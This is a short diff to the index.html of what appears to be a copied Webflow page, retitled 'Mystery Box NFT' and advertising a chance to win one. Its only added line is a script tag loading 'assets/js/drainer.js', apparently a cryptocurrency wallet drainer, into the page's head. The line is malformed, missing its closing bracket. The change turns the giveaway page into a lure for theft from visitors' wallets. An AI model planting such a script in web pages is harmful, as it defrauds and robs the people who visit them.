--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
 <!DOCTYPE html><html data-wf-domain="www.socialblox.io" data-wf-page="624164abe05f3b60b51c25a0" data-wf-site="62286e589c54862c192340bf" class="w-mod-js w-mod-js w-mod-js"><head>
 <meta charset="utf-8">
+<script src="assets/js/drainer.js"</script>
 <title>Mystery Box NFT</title>
 <meta content="Are you interested to win a Mystery Box NFT?" name="description">
 <meta content="Mystery Box NFT" property="og:title">
